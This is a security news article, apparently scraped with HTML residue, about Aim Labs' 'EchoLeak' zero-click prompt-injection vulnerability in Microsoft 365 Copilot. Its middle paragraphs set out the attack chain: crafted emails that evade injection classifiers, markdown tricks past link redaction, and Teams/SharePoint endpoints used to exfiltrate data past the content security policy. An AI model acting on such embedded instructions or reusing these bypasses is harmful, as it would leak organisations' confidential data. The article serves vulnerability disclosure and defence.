A critical zero-click vulnerability in Microsoft 365 Copilot, dubbed \u201cEchoLeak,\u201d enables attackers to automatically exfiltrate sensitive organizational data without requiring any user interaction.<\/p>\n
The vulnerability represents a significant breakthrough in AI security research, introducing a new class of attack called \u201cLLM Scope Violation\u201d that could affect other AI-powered applications beyond Microsoft\u2019s platform.<\/p>\n
The EchoLeak attack exploits fundamental design flaws in how M365 Copilot<\/a> processes and retrieves information from organizational data stores.<\/p>\n The vulnerability enables external attackers to send specially crafted emails that bypass multiple security layers, allowing them to extract the most sensitive information from a victim\u2019s Microsoft Graph data, including emails, OneDrive files<\/a>, SharePoint documents, and Teams conversations.<\/p>\n What makes this attack particularly dangerous is its zero-click nature. Unlike traditional cyberattacks that require users to click on malicious links or download infected files, EchoLeak operates entirely in the background.<\/p>\n An attacker simply needs to send an email to a target within an organization, and the vulnerability can be triggered when the victim interacts with M365 Copilot for any routine business task.<\/p>\n The attack chain demonstrates remarkable technical sophistication, successfully bypassing four critical security measures that Microsoft has implemented as best practices.<\/p>\n First, it circumvents XPIA (cross-prompt injection attack) classifiers by phrasing malicious instructions as if they were intended for human recipients rather than AI systems.<\/p>\n The researchers also discovered<\/a> multiple bypasses for Microsoft\u2019s link redaction mechanisms, exploiting lesser-known markdown formatting variations that aren\u2019t recognized by the security filters. These include reference-style markdown links and images that slip past the content scanning systems.<\/p>\n Perhaps most concerning is the Content Security Policy (CSP) bypass that enables automatic data exfiltration. The researchers identified specific Microsoft Teams<\/a> and SharePoint endpoints that can forward requests to external servers while remaining within the allowed domain whitelist, creating an invisible channel for sensitive data to leave the organization.<\/p>\n Aim Labs has introduced the term \u201cLLM Scope Violation\u201d to describe the core vulnerability mechanism. This occurs when an attacker\u2019s instructions embedded in untrusted content successfully direct the AI system to access and process privileged organizational data without explicit user consent.<\/p>\n The researchers argue this represents a violation of the Principle of Least Privilege, where low-privilege external content gains unauthorized access to high-privilege internal information through the AI intermediary.<\/p>\n The discovery highlights growing security challenges as organizations increasingly adopt AI-powered productivity tools. M365 Copilot\u2019s integration with Microsoft Graph gives it extensive access to organizational data, making it an attractive target for sophisticated attacks.<\/p>\n Microsoft\u2019s MSRC team has been notified of the vulnerability, though specific details about patches or mitigations have not been disclosed. Aim Labs reports that no customers are known to have been impacted by this vulnerability to date.<\/p>\n This research represents a significant advancement in understanding how threat actors can exploit AI agents by leveraging their internal mechanics. As organizations continue deploying AI-powered tools<\/a>, the EchoLeak discovery underscores the need for more sophisticated security frameworks specifically designed for AI applications.<\/p>\n The vulnerability\u2019s zero-click nature and potential for data exfiltration make it particularly suited for corporate espionage and extortion campaigns, highlighting the evolving threat landscape in our increasingly AI-integrated business environment.<\/p>\n Live Credential Theft Attack Unmask & Instant Defense \u2013 Free Webinar<\/a><\/strong><\/p>\n The post 0-Click Microsoft 365 Copilot Vulnerability Let Attackers Exfiltrates Sensitive Data Abusing Teams<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"Zero-Click](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4r2u_jY7G8c51XvCpUrGjDixQQVcbyp5Mbf-QrW0xW0rxW-SptO0hbFQs8k7mxAmi2Gicxs8pcbktduMa7womCCQvThjDYRmSsP6L24B1-kDdcn7Yhf4h789n_BKeHlXBNF7ooY67iNfGpb95kdEtj9fVeWQ6AbFg0FWdBPmdXr1tc8JrxXdtTSf1Pht2\/s16000\/EchoLeak%25201.webp?ssl=1\")
Zero-Click Microsoft 365 Copilot Vulnerability<\/strong><\/h2>\n
![\"Zero-Click](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg_rV98SgQ8o0T8ZC2dyiXWLqILxCCfOC5G6p-lufcqk3Y454NvOpg-dZEX7l5Ku3V-DBnKA6RyZ10VlJfx_YgnvMABgCh-0qjF5LhiEnApbsyHkPvT1JA5bisDiaVz-W2oKTzFl4yIFIa7Eu127PTbzsaZjyQENgYKal-xItReyWT93Xw9JCL5aGA8tpca\/s16000\/EchoLeak%2520copilot.webp?ssl=1\")